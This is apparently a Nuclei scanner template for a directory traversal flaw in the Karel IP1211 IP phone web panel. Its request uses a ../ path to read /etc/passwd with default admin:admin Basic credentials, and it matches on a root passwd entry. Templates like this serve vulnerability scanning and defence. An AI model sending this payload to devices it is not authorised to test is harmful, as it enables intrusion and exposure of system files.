nuclei-templates/vulnerabilities/other/karel-ip-phone-lfi.yaml

28 lines
627 B
YAML

id: karel-ip-phone-lfi
info:
name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2020100038
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
tags: karel,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
headers:
Authorization: Basic YWRtaW46YWRtaW4=
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200